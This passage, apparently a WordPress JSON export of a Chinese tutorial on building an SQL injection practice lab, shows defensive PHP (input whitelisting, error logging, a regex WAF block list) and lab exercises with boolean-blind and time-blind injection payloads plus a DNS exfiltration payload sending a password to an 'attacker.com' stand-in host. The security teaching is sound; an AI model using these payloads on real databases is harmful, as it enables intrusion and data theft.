                      \u6570\u636e\u5e93\u8d26\u6237\u6743\u9650\u5e94\u4e25\u683c\u9650\u5236,\u907f\u514d\u8fc7\u5ea6\u6388\u6743\u3002\u4ee5\u4e0b\u662fMySQL\u6743\u9650\u914d\u7f6e\u793a\u4f8b:<\/p>\n

                      — \u521b\u5efa\u4ec5\u5177\u5907\u67e5\u8be2\u6743\u9650\u7684\u4e13\u7528\u8d26\u6237
                      \nCREATE USER 'webapp'@'localhost' IDENTIFIED BY 'StrongPassword123!';
                      \nGRANT SELECT ON school.students TO 'webapp'@'localhost';<\/p>\n

                      \u8f93\u5165\u9a8c\u8bc1\u4e0e\u8fc7\u6ee4<\/h4>\n

                      \u91c7\u7528\u767d\u540d\u5355\u673a\u5236\u9a8c\u8bc1\u8f93\u5165\u683c\u5f0f,\u5e76\u914d\u5408\u8f6c\u4e49\u51fd\u6570\u4f5c\u4e3a\u8865\u5145\u9632\u62a4:<\/p>\n

                      <?php
                      \n\/\/ \u767d\u540d\u5355\u9a8c\u8bc1(\u5141\u8bb8\u5b57\u6bcd\u6570\u5b57\u53ca\u7279\u5b9a\u7b26\u53f7)
                      \nfunction validateInput($input, $pattern = '\/^[a-zA-Z0-9_@.\\\\-]+$\/') {
                      \n return preg_match($pattern, $input);
                      \n}<\/p>\n

                      \/\/ \u8f6c\u4e49\u7279\u6b8a\u5b57\u7b26(\u9700\u6570\u636e\u5e93\u8fde\u63a5\u5bf9\u8c61)
                      \nfunction escapeInput($input, $conn) {
                      \n return mysqli_real_escape_string($conn, $input);
                      \n}
                      \n?><\/p>\n

                      4. \u9519\u8bef\u5904\u7406\u4e0e\u65e5\u5fd7\u8bb0\u5f55<\/h4>\n

                      php<\/p>\n

                      <?php
                      \n\/\/ \u751f\u4ea7\u73af\u5883\u5173\u95ed\u9519\u8bef\u663e\u793a
                      \nini_set('display_errors', 0);
                      \nini_set('log_errors', 1);
                      \nini_set('error_log', '\/path\/to\/php-error.log');<\/p>\n

                      \/\/ \u81ea\u5b9a\u4e49\u9519\u8bef\u5904\u7406
                      \nfunction errorHandler($errno, $errstr, $errfile, $errline) {
                      \n error_log("[SQL\u5b89\u5168] $errstr in $errfile on line $errline");
                      \n \/\/ \u7ed9\u7528\u6237\u663e\u793a\u901a\u7528\u9519\u8bef\u4fe1\u606f,\u4e0d\u6cc4\u9732\u7ec6\u8282
                      \n echo "\u7cfb\u7edf\u53d1\u751f\u9519\u8bef,\u8bf7\u7a0d\u540e\u91cd\u8bd5\u3002";
                      \n return true; \/\/ \u963b\u6b62PHP\u9ed8\u8ba4\u9519\u8bef\u5904\u7406
                      \n}
                      \nset_error_handler("errorHandler");
                      \n?> <\/p>\n

                      5. \u5b9e\u65bdWeb\u5e94\u7528\u9632\u706b\u5899(WAF)<\/h4>\n

                      php<\/p>\n

                      <?php
                      \n\/\/ \u7b80\u5355\u7684WAF\u89c4\u5219\u793a\u4f8b
                      \nfunction simpleWAF($input) {
                      \n $blockedPatterns = [
                      \n '\/union\\\\s+select\/i',
                      \n '\/select.*from\/i',
                      \n '\/insert.*into\/i',
                      \n '\/update.*set\/i',
                      \n '\/delete.*from\/i',
                      \n '\/drop\\\\s+table\/i',
                      \n '\/–\/', \/\/ SQL\u6ce8\u91ca
                      \n '\/#\/', \/\/ MySQL\u6ce8\u91ca
                      \n '\/\\\\\/\\\\*.*\\\\*\\\\\/\/', \/\/ \u591a\u884c\u6ce8\u91ca
                      \n '\/sleep\\\\(\/i',
                      \n '\/benchmark\\\\(\/i',
                      \n '\/load_file\\\\(\/i',
                      \n '\/into\\\\s+outfile\/i',
                      \n '\/into\\\\s+dumpfile\/i',
                      \n ];<\/p>\n

                      foreach ($blockedPatterns as $pattern) {
                      \n if (preg_match($pattern, $input)) {
                      \n \/\/ \u8bb0\u5f55\u653b\u51fb\u5c1d\u8bd5
                      \n error_log("\u6f5c\u5728SQL\u6ce8\u5165\u653b\u51fb\u68c0\u6d4b: " . substr($input, 0, 100));
                      \n return false; \/\/ \u963b\u6b62\u8bf7\u6c42
                      \n }
                      \n }
                      \n return true;
                      \n}
                      \n?> <\/p>\n

                      \u9776\u573a\u8fdb\u9636\u5b9e\u9a8c<\/h3>\n

                      \u5b9e\u9a8c1:\u5e03\u5c14\u76f2\u6ce8\u5b9e\u8df5<\/h4>\n

                      \u5c1d\u8bd5\u5728\u4e0d\u4f7f\u7528UNION\u67e5\u8be2\u7684\u60c5\u51b5\u4e0b,\u901a\u8fc7\u5e03\u5c14\u6761\u4ef6\u5224\u65ad\u83b7\u53d6\u6570\u636e:<\/p>\n

                      sql<\/p>\n

                      — \u5224\u65ad\u6570\u636e\u5e93\u540d\u79f0\u957f\u5ea6
                      \n' AND LENGTH(DATABASE()) > 5 — <\/p>\n

                      — \u9010\u5b57\u7b26\u731c\u89e3\u6570\u636e\u5e93\u540d
                      \n' AND SUBSTRING(DATABASE(), 1, 1) = 's' — <\/p>\n

                      \u5b9e\u9a8c2:\u65f6\u95f4\u76f2\u6ce8\u5b9e\u8df5<\/h4>\n

                      sql<\/p>\n

                      — \u5982\u679c\u6570\u636e\u5e93\u540d\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f's',\u5219\u5ef6\u8fdf5\u79d2
                      \n' AND IF(SUBSTRING(DATABASE(), 1, 1) = 's', SLEEP(5), 0) — <\/p>\n

                      \u5b9e\u9a8c3:\u5229\u7528DNS\u5916\u5e26\u6570\u636e<\/h4>\n

                      \u5728\u5141\u8bb8\u7684\u60c5\u51b5\u4e0b,\u901a\u8fc7DNS\u67e5\u8be2\u5916\u5e26\u6570\u636e:<\/p>\n

                      sql<\/p>\n

                      — \u5c06\u67e5\u8be2\u7ed3\u679c\u901a\u8fc7DNS\u8bf7\u6c42\u5916\u5e26
                      \n' AND LOAD_FILE(CONCAT('\\\\\\\\\\\\\\\\', (SELECT password FROM students LIMIT 1), '.attacker.com\\\\\\\\test.txt')) — <\/p>\n

                      \u603b\u7ed3\u4e0e\u6269\u5c55<\/h3>\n

                      \u901a\u8fc7\u672c\u9776\u573a\u7684\u642d\u5efa\u4e0e\u5b9e\u8df5,\u6211\u4eec\u6df1\u5165\u7406\u89e3\u4e86:<\/p>\n

                    • \n

                      SQL\u6ce8\u5165\u7684\u4ea7\u751f\u539f\u7406:\u7528\u6237\u8f93\u5165\u672a\u7ecf\u5904\u7406\u76f4\u63a5\u62fc\u63a5\u5230SQL\u8bed\u53e5<\/p>\n<\/li>\n

                    • \n

                      \u653b\u51fb\u6280\u672f\u7684\u6f14\u8fdb:\u4ece\u7b80\u5355\u7ed5\u8fc7\u5230\u76f2\u6ce8\u3001\u65f6\u95f4\u6ce8\u5165\u7b49\u9ad8\u7ea7\u6280\u672f<\/p>\n<\/li>\n

                    • \n

                      \u9632\u5fa1\u7b56\u7565\u7684\u5c42\u6b21\u5316:\u4ece\u8f93\u5165\u9a8c\u8bc1\u5230\u53c2\u6570\u5316\u67e5\u8be2\u7684\u591a\u5c42\u9632\u62a4<\/p>\n<\/li>\n

                      \u6269\u5c55\u5b66\u4e60\u8d44\u6e90<\/h4>\n
                    • \n

                      OWASP SQL\u6ce8\u5165\u9884\u9632\u6307\u5357:https:\/\/cheatsheetseries.owapis.org\/cheatsheets\/SQL_Injection_Prevention_Cheat_Sheet.html<\/p>\n<\/li>\n

                    • \n

                      SQL\u6ce8\u5165\u5b9e\u6218\u9776\u573a:<\/p>\n

                        \n
                      • \n

                        PortSwigger Web Security Academy:https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<\/li>\n

                      • \n

                        SQLi Labs:https:\/\/github.com\/Audi-1\/sqli-labs<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

                      • \n

                        \u81ea\u52a8\u5316\u68c0\u6d4b\u5de5\u5177:<\/p>\n

                          \n
                        • \n

                          SQLMap:http:\/\/sqlmap.org\/<\/p>\n<\/li>\n

                        • \n

                          Burp Suite:https:\/\/portswigger.net\/burp<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

                          \u540e\u7eed\u5b66\u4e60\u5efa\u8bae<\/h4>\n
                        • \n

                          \u5c1d\u8bd5\u642d\u5efa\u4e0d\u540c\u7c7b\u578b\u7684SQL\u6ce8\u5165\u9776\u573a(\u76f2\u6ce8\u3001\u62a5\u9519\u6ce8\u5165\u7b49)<\/p>\n<\/li>\n

                        • \n

                          \u5b66\u4e60\u4f7f\u7528SQLMap\u7b49\u81ea\u52a8\u5316\u5de5\u5177\u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5<\/p>\n<\/li>\n

                        • \n

                          \u7814\u7a76ORM\u6846\u67b6(\u5982Eloquent\u3001Doctrine)\u5982\u4f55\u9632\u6b62SQL\u6ce8\u5165<\/p>\n<\/li>\n

                        • \n

                          \u4e86\u89e3NoSQL\u6ce8\u5165(\u5982MongoDB\u6ce8\u5165)\u4e0eSQL\u6ce8\u5165\u7684\u5f02\u540c<\/p>\n<\/li>\n

                          \u514d\u8d23\u58f0\u660e<\/h3>\n

                          \u91cd\u8981:\u672c\u6559\u7a0b\u4ec5\u4f9b\u6559\u80b2\u5b66\u4e60\u548c\u5408\u6cd5\u5b89\u5168\u6d4b\u8bd5\u4f7f\u7528\u3002\u8bf7\u52a1\u5fc5\u9075\u5b88\u4ee5\u4e0b\u539f\u5219:<\/p>\n

                        • \n

                          \u4ec5\u5728\u4f60\u62e5\u6709\u5b8c\u5168\u6743\u9650\u7684\u7cfb\u7edf\u4e0a\u8fdb\u884c\u6d4b\u8bd5<\/p>\n<\/li>\n

                        • \n

                          \u4e0d\u8981\u5bf9\u4efb\u4f55\u672a\u6388\u6743\u7684\u7cfb\u7edf\u8fdb\u884c\u5b89\u5168\u6d4b\u8bd5<\/p>\n<\/li>\n

                        • \n

                          \u9075\u5b88\u5f53\u5730\u6cd5\u5f8b\u6cd5\u89c4\u548c\u9053\u5fb7\u51c6\u5219<\/p>\n<\/li>\n

                        • \n

                          \u5c06\u6240\u5b66\u77e5\u8bc6\u7528\u4e8e\u7cfb\u7edf\u52a0\u56fa\u548c\u5b89\u5168\u9632\u62a4<\/p>\n<\/li>\n

                          \u901a\u8fc7\u672c\u6587\u7684\u5b66\u4e60,\u4f60\u5e94\u8be5\u5df2\u7ecf\u638c\u63e1\u4e86SQL\u6ce8\u5165\u7684\u57fa\u672c\u539f\u7406\u3001\u653b\u51fb\u6280\u672f\u548c\u9632\u5fa1\u65b9\u6cd5\u3002\u5b89\u5168\u662f\u4e00\u4e2a\u6301\u7eed\u7684\u8fc7\u7a0b,\u4e0d\u65ad\u5b66\u4e60\u3001\u5b9e\u8df5\u548c\u5206\u4eab\u662f\u63d0\u5347\u5b89\u5168\u80fd\u529b\u7684\u5173\u952e\u3002\u795d\u4f60\u5728\u7f51\u7edc\u5b89\u5168\u7684\u5b66\u4e60\u9053\u8def\u4e0a\u4e0d\u65ad\u8fdb\u6b65!<\/p>\n

                          \n

                          \u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"

                          \u5f15\u8a00
                          \nSQL\u6ce8\u5165(SQL Injection)\u4f5c\u4e3aOWASP Top 10\u957f\u671f\u5b58\u5728\u7684\u5b89\u5168\u5a01\u80c1,\u81f3\u4eca\u4ecd\u662fWeb\u5b89\u5168\u9886\u57df\u7684\u6838\u5fc3\u8bae\u9898\u3002\u6839\u636e2025\u5e74\u7f51\u7edc\u5b89\u5168\u62a5\u544a\u663e\u793a,\u8d85\u8fc740%\u7684Web\u5e94\u7528\u6f0f\u6d1e\u4e0eSQL\u6ce8\u5165\u76f8\u5173\u3002\u672c\u535a\u5ba2\u5c06\u901a\u8fc7\u5b9e\u6218\u6f14\u7ec3,\u5e26\u4f60\u4ece\u96f6\u5f00\u59cb\u642d\u5efa\u4e00\u4e2a\u8d34\u8fd1\u771f\u5b9e\u573a\u666f\u7684SQL\u6ce8\u5165\u9776\u573a,\u6df1\u5165\u7406\u89e3\u653b\u51fb\u539f\u7406\u3001\u638c\u63e1\u9632\u5fa1\u65b9\u6cd5\u3002
                          \n\u672c\u6587\u5c06\u57fa\u4e8e\u6211\u8fd1\u671f\u642d\u5efaSQL\u6ce8\u5165\u9776\u573a\u7684\u5b8c\u6574\u8fc7\u7a0b,\u63d0\u4f9b\u8be6\u5c3d\u7684\u5b9e\u64cd\u6307\u5357\u3001\u5de5<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[7929,7928,4761,100,122],"topic":[],"class_list":["post-74890","post","type-post","status-publish","format-standard","hentry","category-server","tag-php","tag-7928","tag-sql","tag-100","tag-122"],"yoast_head":"\n\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/74890.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u5f15\u8a00 SQL\u6ce8\u5165(SQL Injection)\u4f5c\u4e3aOWASP Top 10\u957f\u671f\u5b58\u5728\u7684\u5b89\u5168\u5a01\u80c1,\u81f3\u4eca\u4ecd\u662fWeb\u5b89\u5168\u9886\u57df\u7684\u6838\u5fc3\u8bae\u9898\u3002\u6839\u636e2025\u5e74\u7f51\u7edc\u5b89\u5168\u62a5\u544a\u663e\u793a,\u8d85\u8fc740%\u7684Web\u5e94\u7528\u6f0f\u6d1e\u4e0eSQL\u6ce8\u5165\u76f8\u5173\u3002\u672c\u535a\u5ba2\u5c06\u901a\u8fc7\u5b9e\u6218\u6f14\u7ec3,\u5e26\u4f60\u4ece\u96f6\u5f00\u59cb\u642d\u5efa\u4e00\u4e2a\u8d34\u8fd1\u771f\u5b9e\u573a\u666f\u7684SQL\u6ce8\u5165\u9776\u573a,\u6df1\u5165\u7406\u89e3\u653b\u51fb\u539f\u7406\u3001\u638c\u63e1\u9632\u5fa1\u65b9\u6cd5\u3002 \u672c\u6587\u5c06\u57fa\u4e8e\u6211\u8fd1\u671f\u642d\u5efaSQL\u6ce8\u5165\u9776\u573a\u7684\u5b8c\u6574\u8fc7\u7a0b,\u63d0\u4f9b\u8be6\u5c3d\u7684\u5b9e\u64cd\u6307\u5357\u3001\u5de5\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/74890.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-10T13:49:19+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/74890.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/74890.html\",\"name\":\"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-02-10T13:49:19+00:00\",\"dateModified\":\"2026-02-10T13:49:19+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/74890.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/74890.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/74890.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/74890.html","og_locale":"zh_CN","og_type":"article","og_title":"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u5f15\u8a00 SQL\u6ce8\u5165(SQL Injection)\u4f5c\u4e3aOWASP Top 10\u957f\u671f\u5b58\u5728\u7684\u5b89\u5168\u5a01\u80c1,\u81f3\u4eca\u4ecd\u662fWeb\u5b89\u5168\u9886\u57df\u7684\u6838\u5fc3\u8bae\u9898\u3002\u6839\u636e2025\u5e74\u7f51\u7edc\u5b89\u5168\u62a5\u544a\u663e\u793a,\u8d85\u8fc740%\u7684Web\u5e94\u7528\u6f0f\u6d1e\u4e0eSQL\u6ce8\u5165\u76f8\u5173\u3002\u672c\u535a\u5ba2\u5c06\u901a\u8fc7\u5b9e\u6218\u6f14\u7ec3,\u5e26\u4f60\u4ece\u96f6\u5f00\u59cb\u642d\u5efa\u4e00\u4e2a\u8d34\u8fd1\u771f\u5b9e\u573a\u666f\u7684SQL\u6ce8\u5165\u9776\u573a,\u6df1\u5165\u7406\u89e3\u653b\u51fb\u539f\u7406\u3001\u638c\u63e1\u9632\u5fa1\u65b9\u6cd5\u3002 \u672c\u6587\u5c06\u57fa\u4e8e\u6211\u8fd1\u671f\u642d\u5efaSQL\u6ce8\u5165\u9776\u573a\u7684\u5b8c\u6574\u8fc7\u7a0b,\u63d0\u4f9b\u8be6\u5c3d\u7684\u5b9e\u64cd\u6307\u5357\u3001\u5de5","og_url":"https:\/\/www.wsisp.com\/helps\/74890.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-02-10T13:49:19+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"8 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/74890.html","url":"https:\/\/www.wsisp.com\/helps\/74890.html","name":"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-02-10T13:49:19+00:00","dateModified":"2026-02-10T13:49:19+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/74890.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/74890.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/74890.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/74890","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=74890"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/74890\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=74890"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=74890"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=74890"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=74890"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}